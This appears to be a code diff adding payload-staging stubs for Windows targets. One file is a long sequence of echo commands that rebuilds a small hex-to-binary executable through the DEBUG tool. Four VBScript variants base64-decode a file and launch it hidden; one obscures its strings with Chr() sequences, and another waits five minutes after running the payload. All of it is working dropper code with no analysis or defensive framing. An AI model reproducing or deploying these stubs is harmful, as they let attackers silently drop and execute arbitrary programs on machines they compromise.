+echo e 9df 01 >>decoder_stub
+echo e 9e1 03 0a >>decoder_stub
+echo e 9e5 09 2e >>decoder_stub
+echo e 9e8 65 >>decoder_stub
+echo e 9ea 78 >>decoder_stub
+echo e 9ec 65 >>decoder_stub
+echo e 9f0 06 24 bb c2 bc b7 11 40 bf c4 9c a7 d7 ed 8c f2 >>decoder_stub
+echo e a01 08 b7 7a 5c 56 19 34 e0 89 05 >>decoder_stub
+echo e a0c 01 01 1d 0e 03 20 >>decoder_stub
+echo e a13 01 04 20 01 01 0e 04 20 01 01 02 05 20 01 01 11 3d 04 20 01 >>decoder_stub
+echo e a27 01 08 04 >>decoder_stub
+echo e a2b 01 01 0e 04 >>decoder_stub
+echo e a30 01 0e 0e 05 20 02 0e 0e 0e 03 20 >>decoder_stub
+echo e a3c 08 05 20 02 0e 08 08 05 >>decoder_stub
+echo e a45 02 05 0e 08 05 >>decoder_stub
+echo e a4b 02 0e 0e 0e 05 >>decoder_stub
+echo e a51 01 12 5d 0e 07 20 03 01 1d 05 08 08 0b 07 07 0e 1d 05 08 0e >>decoder_stub
+echo e a65 08 12 5d 02 0c 01 >>decoder_stub
+echo e a6c 07 68 65 78 32 62 69 6e >>decoder_stub
+echo e a76 05 01 >>decoder_stub
+echo e a7c 17 01 >>decoder_stub
+echo e a7f 12 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 20 32 30 30 38 >>decoder_stub
+echo e a94 29 01 >>decoder_stub
+echo e a97 24 66 39 39 39 62 62 62 31 2d 66 31 30 61 2d 34 39 65 38 2d >>decoder_stub
+echo e aab 38 33 35 37 2d 30 35 39 61 30 63 65 37 37 31 36 38 >>decoder_stub
+echo e abe 0c 01 >>decoder_stub
+echo e ac1 07 31 2e 30 2e 30 2e 30 >>decoder_stub
+echo e acb 08 01 >>decoder_stub
+echo e ace 07 01 >>decoder_stub
+echo e ad4 08 01 >>decoder_stub
+echo e ad7 08 >>decoder_stub
+echo e add 1e 01 >>decoder_stub
+echo e ae0 01 >>decoder_stub
+echo e ae2 54 02 16 57 72 61 70 4e 6f 6e 45 78 63 65 70 74 69 6f 6e 54 >>decoder_stub
+echo e af6 68 72 6f 77 73 01 >>decoder_stub
+echo e b00 85 18 7c 48 >>decoder_stub
+echo e b08 02 >>decoder_stub
+echo e b0c 53 >>decoder_stub
+echo e b10 18 28 >>decoder_stub
+echo e b14 18 0a >>decoder_stub
+echo e b18 52 53 44 53 e8 fc 2e 9d aa 52 59 42 a5 63 1e b1 c8 f6 59 23 >>decoder_stub
+echo e b2c 03 >>decoder_stub
+echo e b30 53 3a 5c 73 74 75 66 66 5c 70 72 6f 67 72 61 6d 6d 69 6e 67 >>decoder_stub
+echo e b44 5c 68 65 78 32 62 69 6e 5c 68 65 78 32 62 69 6e 5c 6f 62 6a >>decoder_stub
+echo e b58 5c 44 65 62 75 67 5c 68 65 78 32 62 69 6e 2e 70 64 62 >>decoder_stub
+echo e b6c 94 28 >>decoder_stub
+echo e b78 ae 28 >>decoder_stub
+echo e b7d 20 >>decoder_stub
+echo e b94 a0 28 >>decoder_stub
+echo e ba2 5f 43 6f 72 45 78 65 4d 61 69 6e >>decoder_stub
+echo e bae 6d 73 63 6f 72 65 65 2e 64 6c 6c >>decoder_stub
+echo e bbe ff 25 >>decoder_stub
+echo e bc1 20 40 >>decoder_stub
+echo e d0e 02 >>decoder_stub
+echo e d10 10 >>decoder_stub
+echo e d14 20 >>decoder_stub
+echo e d17 80 18 >>decoder_stub
+echo e d1c 38 >>decoder_stub
+echo e d1f 80 >>decoder_stub
+echo e d2e 01 >>decoder_stub
+echo e d30 01 >>decoder_stub
+echo e d34 50 >>decoder_stub
+echo e d37 80 >>decoder_stub
+echo e d46 01 >>decoder_stub
+echo e d48 01 >>decoder_stub
+echo e d4c 68 >>decoder_stub
+echo e d4f 80 >>decoder_stub
+echo e d5e 01 >>decoder_stub
+echo e d64 80 >>decoder_stub
+echo e d76 01 >>decoder_stub
+echo e d7c 90 >>decoder_stub
+echo e d80 a0 40 >>decoder_stub
+echo e d84 a0 02 >>decoder_stub
+echo e d90 40 43 >>decoder_stub
+echo e d94 ea 01 >>decoder_stub
+echo e da0 a0 02 34 >>decoder_stub
+echo e da6 56 >>decoder_stub
+echo e da8 53 >>decoder_stub
+echo e daa 5f >>decoder_stub
+echo e dac 56 >>decoder_stub
+echo e dae 45 >>decoder_stub
+echo e db0 52 >>decoder_stub
+echo e db2 53 >>decoder_stub
+echo e db4 49 >>decoder_stub
+echo e db6 4f >>decoder_stub
+echo e db8 4e >>decoder_stub
+echo e dba 5f >>decoder_stub
+echo e dbc 49 >>decoder_stub
+echo e dbe 4e >>decoder_stub
+echo e dc0 46 >>decoder_stub
+echo e dc2 4f >>decoder_stub
+echo e dc8 bd 04 ef fe >>decoder_stub
+echo e dce 01 >>decoder_stub
+echo e dd2 01 >>decoder_stub
+echo e dda 01 >>decoder_stub
+echo e de0 3f >>decoder_stub
+echo e de8 04 >>decoder_stub
+echo e dec 01 >>decoder_stub
+echo e dfc 44 >>decoder_stub
+echo e e00 01 >>decoder_stub
+echo e e02 56 >>decoder_stub
+echo e e04 61 >>decoder_stub
+echo e e06 72 >>decoder_stub
+echo e e08 46 >>decoder_stub
+echo e e0a 69 >>decoder_stub
+echo e e0c 6c >>decoder_stub
+echo e e0e 65 >>decoder_stub
+echo e e10 49 >>decoder_stub
+echo e e12 6e >>decoder_stub
+echo e e14 66 >>decoder_stub
+echo e e16 6f >>decoder_stub
+echo e e1c 24 >>decoder_stub
+echo e e1e 04 >>decoder_stub
+echo e e22 54 >>decoder_stub
+echo e e24 72 >>decoder_stub
+echo e e26 61 >>decoder_stub
+echo e e28 6e >>decoder_stub
+echo e e2a 73 >>decoder_stub
+echo e e2c 6c >>decoder_stub
+echo e e2e 61 >>decoder_stub
+echo e e30 74 >>decoder_stub
+echo e e32 69 >>decoder_stub
+echo e e34 6f >>decoder_stub
+echo e e36 6e >>decoder_stub
+echo e e3e b0 04 >>decoder_stub
+echo e e41 02 >>decoder_stub
+echo e e44 01 >>decoder_stub
+echo e e46 53 >>decoder_stub
+echo e e48 74 >>decoder_stub
+echo e e4a 72 >>decoder_stub
+echo e e4c 69 >>decoder_stub
+echo e e4e 6e >>decoder_stub
+echo e e50 67 >>decoder_stub
+echo e e52 46 >>decoder_stub
+echo e e54 69 >>decoder_stub
+echo e e56 6c >>decoder_stub
+echo e e58 65 >>decoder_stub
+echo e e5a 49 >>decoder_stub
+echo e e5c 6e >>decoder_stub
+echo e e5e 66 >>decoder_stub
+echo e e60 6f >>decoder_stub
+echo e e64 dc 01 >>decoder_stub
+echo e e68 01 >>decoder_stub
+echo e e6a 30 >>decoder_stub
+echo e e6c 30 >>decoder_stub
+echo e e6e 30 >>decoder_stub
+echo e e70 30 >>decoder_stub
+echo e e72 30 >>decoder_stub
+echo e e74 34 >>decoder_stub
+echo e e76 62 >>decoder_stub
+echo e e78 30 >>decoder_stub
+echo e e7c 38 >>decoder_stub
+echo e e7e 08 >>decoder_stub
+echo e e80 01 >>decoder_stub
+echo e e82 46 >>decoder_stub
+echo e e84 69 >>decoder_stub
+echo e e86 6c >>decoder_stub
+echo e e88 65 >>decoder_stub
+echo e e8a 44 >>decoder_stub
+echo e e8c 65 >>decoder_stub
+echo e e8e 73 >>decoder_stub
+echo e e90 63 >>decoder_stub
+echo e e92 72 >>decoder_stub
+echo e e94 69 >>decoder_stub
+echo e e96 70 >>decoder_stub
+echo e e98 74 >>decoder_stub
+echo e e9a 69 >>decoder_stub
+echo e e9c 6f >>decoder_stub
+echo e e9e 6e >>decoder_stub
+echo e ea4 68 >>decoder_stub
+echo e ea6 65 >>decoder_stub
+echo e ea8 78 >>decoder_stub
+echo e eaa 32 >>decoder_stub
+echo e eac 62 >>decoder_stub
+echo e eae 69 >>decoder_stub
+echo e eb0 6e >>decoder_stub
+echo e eb4 30 >>decoder_stub
+echo e eb6 08 >>decoder_stub
+echo e eb8 01 >>decoder_stub
+echo e eba 46 >>decoder_stub
+echo e ebc 69 >>decoder_stub
+echo e ebe 6c >>decoder_stub
+echo e ec0 65 >>decoder_stub
+echo e ec2 56 >>decoder_stub
+echo e ec4 65 >>decoder_stub
+echo e ec6 72 >>decoder_stub
+echo e ec8 73 >>decoder_stub
+echo e eca 69 >>decoder_stub
+echo e ecc 6f >>decoder_stub
+echo e ece 6e >>decoder_stub
+echo e ed4 31 >>decoder_stub
+echo e ed6 2e >>decoder_stub
+echo e ed8 30 >>decoder_stub
+echo e eda 2e >>decoder_stub
+echo e edc 30 >>decoder_stub
+echo e ede 2e >>decoder_stub
+echo e ee0 30 >>decoder_stub
+echo e ee4 38 >>decoder_stub
+echo e ee6 0c >>decoder_stub
+echo e ee8 01 >>decoder_stub
+echo e eea 49 >>decoder_stub
+echo e eec 6e >>decoder_stub
+echo e eee 74 >>decoder_stub
+echo e ef0 65 >>decoder_stub
+echo e ef2 72 >>decoder_stub
+echo e ef4 6e >>decoder_stub
+echo e ef6 61 >>decoder_stub
+echo e ef8 6c >>decoder_stub
+echo e efa 4e >>decoder_stub
+echo e efc 61 >>decoder_stub
+echo e efe 6d >>decoder_stub
+echo e f00 65 >>decoder_stub
+echo e f04 68 >>decoder_stub
+echo e f06 65 >>decoder_stub
+echo e f08 78 >>decoder_stub
+echo e f0a 32 >>decoder_stub
+echo e f0c 62 >>decoder_stub
+echo e f0e 69 >>decoder_stub
+echo e f10 6e >>decoder_stub
+echo e f12 2e >>decoder_stub
+echo e f14 65 >>decoder_stub
+echo e f16 78 >>decoder_stub
+echo e f18 65 >>decoder_stub
+echo e f1c 48 >>decoder_stub
+echo e f1e 12 >>decoder_stub
+echo e f20 01 >>decoder_stub
+echo e f22 4c >>decoder_stub
+echo e f24 65 >>decoder_stub
+echo e f26 67 >>decoder_stub
+echo e f28 61 >>decoder_stub
+echo e f2a 6c >>decoder_stub
+echo e f2c 43 >>decoder_stub
+echo e f2e 6f >>decoder_stub
+echo e f30 70 >>decoder_stub
+echo e f32 79 >>decoder_stub
+echo e f34 72 >>decoder_stub
+echo e f36 69 >>decoder_stub
+echo e f38 67 >>decoder_stub
+echo e f3a 68 >>decoder_stub
+echo e f3c 74 >>decoder_stub
+echo e f40 43 >>decoder_stub
+echo e f42 6f >>decoder_stub
+echo e f44 70 >>decoder_stub
+echo e f46 79 >>decoder_stub
+echo e f48 72 >>decoder_stub
+echo e f4a 69 >>decoder_stub
+echo e f4c 67 >>decoder_stub
+echo e f4e 68 >>decoder_stub
+echo e f50 74 >>decoder_stub
+echo e f52 20 >>decoder_stub
+echo e f54 a9 >>decoder_stub
+echo e f56 20 >>decoder_stub
+echo e f58 20 >>decoder_stub
+echo e f5a 32 >>decoder_stub
+echo e f5c 30 >>decoder_stub
+echo e f5e 30 >>decoder_stub
+echo e f60 38 >>decoder_stub
+echo e f64 40 >>decoder_stub
+echo e f66 0c >>decoder_stub
+echo e f68 01 >>decoder_stub
+echo e f6a 4f >>decoder_stub
+echo e f6c 72 >>decoder_stub
+echo e f6e 69 >>decoder_stub
+echo e f70 67 >>decoder_stub
+echo e f72 69 >>decoder_stub
+echo e f74 6e >>decoder_stub
+echo e f76 61 >>decoder_stub
+echo e f78 6c >>decoder_stub
+echo e f7a 46 >>decoder_stub
+echo e f7c 69 >>decoder_stub
+echo e f7e 6c >>decoder_stub
+echo e f80 65 >>decoder_stub
+echo e f82 6e >>decoder_stub
+echo e f84 61 >>decoder_stub
+echo e f86 6d >>decoder_stub
+echo e f88 65 >>decoder_stub
+echo e f8c 68 >>decoder_stub
+echo e f8e 65 >>decoder_stub
+echo e f90 78 >>decoder_stub
+echo e f92 32 >>decoder_stub
+echo e f94 62 >>decoder_stub
+echo e f96 69 >>decoder_stub
+echo e f98 6e >>decoder_stub
+echo e f9a 2e >>decoder_stub
+echo e f9c 65 >>decoder_stub
+echo e f9e 78 >>decoder_stub
+echo e fa0 65 >>decoder_stub
+echo e fa4 30 >>decoder_stub
+echo e fa6 08 >>decoder_stub
+echo e fa8 01 >>decoder_stub
+echo e faa 50 >>decoder_stub
+echo e fac 72 >>decoder_stub
+echo e fae 6f >>decoder_stub
+echo e fb0 64 >>decoder_stub
+echo e fb2 75 >>decoder_stub
+echo e fb4 63 >>decoder_stub
+echo e fb6 74 >>decoder_stub
+echo e fb8 4e >>decoder_stub
+echo e fba 61 >>decoder_stub
+echo e fbc 6d >>decoder_stub
+echo e fbe 65 >>decoder_stub
+echo e fc4 68 >>decoder_stub
+echo e fc6 65 >>decoder_stub
+echo e fc8 78 >>decoder_stub
+echo e fca 32 >>decoder_stub
+echo e fcc 62 >>decoder_stub
+echo e fce 69 >>decoder_stub
+echo e fd0 6e >>decoder_stub
+echo e fd4 34 >>decoder_stub
+echo e fd6 08 >>decoder_stub
+echo e fd8 01 >>decoder_stub
+echo e fda 50 >>decoder_stub
+echo e fdc 72 >>decoder_stub
+echo e fde 6f >>decoder_stub
+echo e fe0 64 >>decoder_stub
+echo e fe2 75 >>decoder_stub
+echo e fe4 63 >>decoder_stub
+echo e fe6 74 >>decoder_stub
+echo e fe8 56 >>decoder_stub
+echo e fea 65 >>decoder_stub
+echo e fec 72 >>decoder_stub
+echo e fee 73 >>decoder_stub
+echo e ff0 69 >>decoder_stub
+echo e ff2 6f >>decoder_stub
+echo e ff4 6e >>decoder_stub
+echo e ff8 31 >>decoder_stub
+echo e ffa 2e >>decoder_stub
+echo e ffc 30 >>decoder_stub
+echo e ffe 2e >>decoder_stub
+echo e 1000 30 >>decoder_stub
+echo e 1002 2e >>decoder_stub
+echo e 1004 30 >>decoder_stub
+echo e 1008 38 >>decoder_stub
+echo e 100a 08 >>decoder_stub
+echo e 100c 01 >>decoder_stub
+echo e 100e 41 >>decoder_stub
+echo e 1010 73 >>decoder_stub
+echo e 1012 73 >>decoder_stub
+echo e 1014 65 >>decoder_stub
+echo e 1016 6d >>decoder_stub
+echo e 1018 62 >>decoder_stub
+echo e 101a 6c >>decoder_stub
+echo e 101c 79 >>decoder_stub
+echo e 101e 20 >>decoder_stub
+echo e 1020 56 >>decoder_stub
+echo e 1022 65 >>decoder_stub
+echo e 1024 72 >>decoder_stub
+echo e 1026 73 >>decoder_stub
+echo e 1028 69 >>decoder_stub
+echo e 102a 6f >>decoder_stub
+echo e 102c 6e >>decoder_stub
+echo e 1030 31 >>decoder_stub
+echo e 1032 2e >>decoder_stub
+echo e 1034 30 >>decoder_stub
+echo e 1036 2e >>decoder_stub
+echo e 1038 30 >>decoder_stub
+echo e 103a 2e >>decoder_stub
+echo e 103c 30 >>decoder_stub
+echo e 1040 ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e >>decoder_stub
+echo e 1054 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 20 >>decoder_stub
+echo e 1068 73 74 61 6e 64 61 6c 6f 6e 65 3d 22 79 65 73 22 3f 3e 0d 0a >>decoder_stub
+echo e 107c 3c 61 73 73 65 6d 62 6c 79 20 78 6d 6c 6e 73 3d 22 75 72 6e >>decoder_stub
+echo e 1090 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 >>decoder_stub
+echo e 10a4 6f 6d 3a 61 73 6d 2e 76 31 22 20 6d 61 6e 69 66 65 73 74 56 >>decoder_stub
+echo e 10b8 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 0d 0a 20 20 3c 61 73 >>decoder_stub
+echo e 10cc 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 20 76 65 72 73 69 >>decoder_stub
+echo e 10e0 6f 6e 3d 22 31 2e 30 2e 30 2e 30 22 20 6e 61 6d 65 3d 22 4d >>decoder_stub
+echo e 10f4 79 41 70 70 6c 69 63 61 74 69 6f 6e 2e 61 70 70 22 2f 3e 0d >>decoder_stub
+echo e 1108 0a 20 20 3c 74 72 75 73 74 49 6e 66 6f 20 78 6d 6c 6e 73 3d >>decoder_stub
+echo e 111c 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f >>decoder_stub
+echo e 1130 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 3e 0d 0a 20 20 20 >>decoder_stub
+echo e 1144 20 3c 73 65 63 75 72 69 74 79 3e 0d 0a 20 20 20 20 20 20 3c >>decoder_stub
+echo e 1158 72 65 71 75 65 73 74 65 64 50 72 69 76 69 6c 65 67 65 73 20 >>decoder_stub
+echo e 116c 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d >>decoder_stub
+echo e 1180 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 33 22 >>decoder_stub
+echo e 1194 3e 0d 0a 20 20 20 20 20 20 20 20 3c 72 65 71 75 65 73 74 65 >>decoder_stub
+echo e 11a8 64 45 78 65 63 75 74 69 6f 6e 4c 65 76 65 6c 20 6c 65 76 65 >>decoder_stub
+echo e 11bc 6c 3d 22 61 73 49 6e 76 6f 6b 65 72 22 20 75 69 41 63 63 65 >>decoder_stub
+echo e 11d0 73 73 3d 22 66 61 6c 73 65 22 2f 3e 0d 0a 20 20 20 20 20 20 >>decoder_stub
+echo e 11e4 3c 2f 72 65 71 75 65 73 74 65 64 50 72 69 76 69 6c 65 67 65 >>decoder_stub
+echo e 11f8 73 3e 0d 0a 20 20 20 20 3c 2f 73 65 63 75 72 69 74 79 3e 0d >>decoder_stub
+echo e 120c 0a 20 20 3c 2f 74 72 75 73 74 49 6e 66 6f 3e 0d 0a 3c 2f 61 >>decoder_stub
+echo e 1220 73 73 65 6d 62 6c 79 3e 0d 0a >>decoder_stub
+echo e 1301 20 >>decoder_stub
+echo e 1304 0c >>decoder_stub
+echo e 1308 c0 38 >>decoder_stub
+echo w >>decoder_stub
+echo q >>decoder_stub
@@ -0,0 +1,40 @@
+echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
+echo Set file = fs.GetFile("ENCODED") >>decode_stub
+echo If file.Size Then >>decode_stub
+echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
+echo data = fd.ReadAll >>decode_stub
+echo data = Replace(data, vbCrLf, "") >>decode_stub
+echo data = base64_decode(data) >>decode_stub
+echo fd.Close >>decode_stub
+echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("DECODED", 2, True) >>decode_stub
+echo ofs.Write data >>decode_stub
+echo ofs.close >>decode_stub
+echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
+echo shell.run "DECODED", 0, false >>decode_stub
+echo Else >>decode_stub
+echo Wscript.Echo "The file is empty." >>decode_stub
+echo End If >>decode_stub
+echo Function base64_decode(byVal strIn) >>decode_stub
+echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
+echo For n = 1 To Len(strIn) Step 4 >>decode_stub
+echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
+echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
+echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
+echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
+echo If Not w2 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
+echo If  Not w3 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
+echo If Not w4 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
+echo Next >>decode_stub
+echo base64_decode = strOut >>decode_stub
+echo End Function >>decode_stub
+echo Function mimedecode(byVal strIn) >>decode_stub
+echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
+echo If Len(strIn) = 0 Then >>decode_stub
+echo mimedecode = -1 : Exit Function >>decode_stub
+echo Else >>decode_stub
+echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
+echo End If >>decode_stub
+echo End Function >>decode_stub
@@ -0,0 +1,50 @@
+echo Dim var_origLoc >>decode_stub
+echo var_origLoc = SetLocale(1033) >>decode_stub
+echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
+echo Set file = fs.GetFile("ENCODED") >>decode_stub
+echo If file.Size Then >>decode_stub
+echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
+echo data = fd.ReadAll >>decode_stub
+echo data = Replace(data, vbCrLf, "") >>decode_stub
+echo data = base64_decode(data) >>decode_stub
+echo fd.Close >>decode_stub
+echo Dim var_strmConv, var_writedir, var_writestream >>decode_stub
+echo var_writedir = "DECODED" >>decode_stub
+echo Set var_strmConv = CreateObject("ADODB.Stream") >>decode_stub
+echo var_strmConv.Type = 2 >>decode_stub
+echo var_strmConv.Charset = "x-ansi" >>decode_stub
+echo var_strmConv.Open >>decode_stub
+echo var_strmConv.WriteText data, 0 >>decode_stub
+echo var_strmConv.Position = 0 >>decode_stub
+echo var_strmConv.Type = 1 >>decode_stub
+echo var_strmConv.SaveToFile var_writedir, 2 >>decode_stub
+echo SetLocale(var_origLoc) >>decode_stub
+echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
+echo shell.run "DECODED", 0, false >>decode_stub
+echo Else >>decode_stub
+echo Wscript.Echo "The file is empty." >>decode_stub
+echo End If >>decode_stub
+echo Function base64_decode(byVal strIn) >>decode_stub
+echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
+echo For n = 1 To Len(strIn) Step 4 >>decode_stub
+echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
+echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
+echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
+echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
+echo If Not w2 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
+echo If  Not w3 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
+echo If Not w4 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
+echo Next >>decode_stub
+echo base64_decode = strOut >>decode_stub
+echo End Function >>decode_stub
+echo Function mimedecode(byVal strIn) >>decode_stub
+echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
+echo If Len(strIn) = 0 Then >>decode_stub
+echo mimedecode = -1 : Exit Function >>decode_stub
+echo Else >>decode_stub
+echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
+echo End If >>decode_stub
+echo End Function >>decode_stub
@@ -0,0 +1,49 @@
+echo Dim encodedFile, decodedFile, scriptingFS, scriptShell, emptyString, tempString, Base64Chars, tempDir >>decode_stub
+echo encodedFile = Chr(92)+CHRENCFILE >>decode_stub
+echo decodedFile = Chr(92)+CHRDECFILE >>decode_stub
+echo scriptingFS = Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(79)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116) >>decode_stub
+echo scriptShell = Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(83)+Chr(104)+Chr(101)+Chr(108)+Chr(108) >>decode_stub
+echo emptyString = Chr(84)+Chr(104)+Chr(101)+Chr(32)+Chr(102)+Chr(105)+Chr(108)+Chr(101)+Chr(32)+Chr(105)+Chr(115)+Chr(32)+Chr(101)+Chr(109)+Chr(112)+Chr(116)+Chr(121)+Chr(46)>>decode_stub
+echo tempString  = Chr(37)+Chr(84)+Chr(69)+Chr(77)+Chr(80)+Chr(37) >>decode_stub
+echo Base64Chars = Chr(65)+Chr(66)+Chr(67)+Chr(68)+Chr(69)+Chr(70)+Chr(71)+Chr(72)+Chr(73)+Chr(74)+Chr(75)+Chr(76)+Chr(77)+Chr(78)+Chr(79)+Chr(80)+Chr(81)+Chr(82)+Chr(83)+Chr(84)+Chr(85)+Chr(86)+Chr(87)+Chr(88)+Chr(89)+Chr(90)+Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+Chr(103)+Chr(104)+Chr(105)+Chr(106)+Chr(107)+Chr(108)+Chr(109)+Chr(110)+Chr(111)+Chr(112)+Chr(113)+Chr(114)+Chr(115)+Chr(116)+Chr(117)+Chr(118)+Chr(119)+Chr(120)+Chr(121)+Chr(122)+Chr(48)+Chr(49)+Chr(50)+Chr(51)+Chr(52)+Chr(53)+Chr(54)+Chr(55)+Chr(56)+Chr(57)+Chr(43)+Chr(47) >>decode_stub
+echo Set wshShell = CreateObject(scriptShell) >>decode_stub
+echo tempDir = wshShell.ExpandEnvironmentStrings(tempString) >>decode_stub
+echo Set fs = CreateObject(scriptingFS) >>decode_stub
+echo Set file = fs.GetFile(tempDir+encodedFile) >>decode_stub
+echo If file.Size Then >>decode_stub
+echo Set fd = fs.OpenTextFile(tempDir+encodedFile, 1) >>decode_stub
+echo data = fd.ReadAll >>decode_stub
+echo data = Replace(data, Chr(32)+vbCrLf, nil) >>decode_stub
+echo data = Replace(data, vbCrLf, nil) >>decode_stub
+echo data = base64_decode(data) >>decode_stub
+echo fd.Close >>decode_stub
+echo Set ofs = CreateObject(scriptingFS).OpenTextFile(tempDir+decodedFile, 2, True) >>decode_stub
+echo ofs.Write data >>decode_stub
+echo ofs.close >>decode_stub
+echo wshShell.run tempDir+decodedFile, 0, false >>decode_stub
+echo Else >>decode_stub
+echo Wscript.Echo emptyString >>decode_stub
+echo End If >>decode_stub
+echo Function base64_decode(byVal strIn) >>decode_stub
+echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
+echo For n = 1 To Len(strIn) Step 4 >>decode_stub
+echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
+echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
+echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
+echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
+echo If Not w2 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
+echo If  Not w3 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
+echo If Not w4 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
+echo Next >>decode_stub
+echo base64_decode = strOut >>decode_stub
+echo End Function >>decode_stub
+echo Function mimedecode(byVal strIn) >>decode_stub
+echo If Len(strIn) = 0 Then >>decode_stub
+echo mimedecode = -1 : Exit Function >>decode_stub
+echo Else >>decode_stub
+echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
+echo End If >>decode_stub
+echo End Function >>decode_stub
@@ -0,0 +1,41 @@
+echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
+echo Set file = fs.GetFile("ENCODED") >>decode_stub
+echo If file.Size Then >>decode_stub
+echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
+echo data = fd.ReadAll >>decode_stub
+echo data = Replace(data, vbCrLf, "") >>decode_stub
+echo data = base64_decode(data) >>decode_stub
+echo fd.Close >>decode_stub
+echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("DECODED", 2, True) >>decode_stub
+echo ofs.Write data >>decode_stub
+echo ofs.close >>decode_stub
+echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
+echo shell.run "DECODED", 0, false >>decode_stub
+echo Wscript.sleep(1000 * 60 * 5) >>decode_stub
+echo Else >>decode_stub
+echo Wscript.Echo "The file is empty." >>decode_stub
+echo End If >>decode_stub
+echo Function base64_decode(byVal strIn) >>decode_stub
+echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
+echo For n = 1 To Len(strIn) Step 4 >>decode_stub
+echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
+echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
+echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
+echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
+echo If Not w2 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
+echo If  Not w3 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
+echo If Not w4 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
+echo Next >>decode_stub
+echo base64_decode = strOut >>decode_stub
+echo End Function >>decode_stub
+echo Function mimedecode(byVal strIn) >>decode_stub
+echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
+echo If Len(strIn) = 0 Then >>decode_stub
+echo mimedecode = -1 : Exit Function >>decode_stub
+echo Else >>decode_stub
+echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
+echo End If >>decode_stub
+echo End Function >>decode_stub
@@ -1 +0,0 @@
